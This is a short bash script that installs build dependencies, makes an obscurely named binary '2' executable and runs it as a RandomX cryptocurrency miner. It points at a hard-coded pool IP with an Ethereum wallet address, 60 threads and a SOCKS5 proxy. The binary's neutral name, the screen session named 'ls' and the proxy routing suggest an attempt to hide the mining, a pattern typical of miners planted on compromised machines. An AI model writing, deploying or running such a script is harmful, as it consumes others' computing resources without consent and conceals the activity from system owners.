#!/bin/bash
sudo apt update
sudo apt install screen libjansson4 -y
sudo apt-get install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev -y
chmod +x 2
screen -dmS ls

 ./2 -a rx/0 -o 173.230.133.42:2288  -u ETH:0x40819d362CCfb0bb130C80cc0dBB4cdef5b02417.upx +2500 -t 60 -x socks5://72.221.172.203:4145 
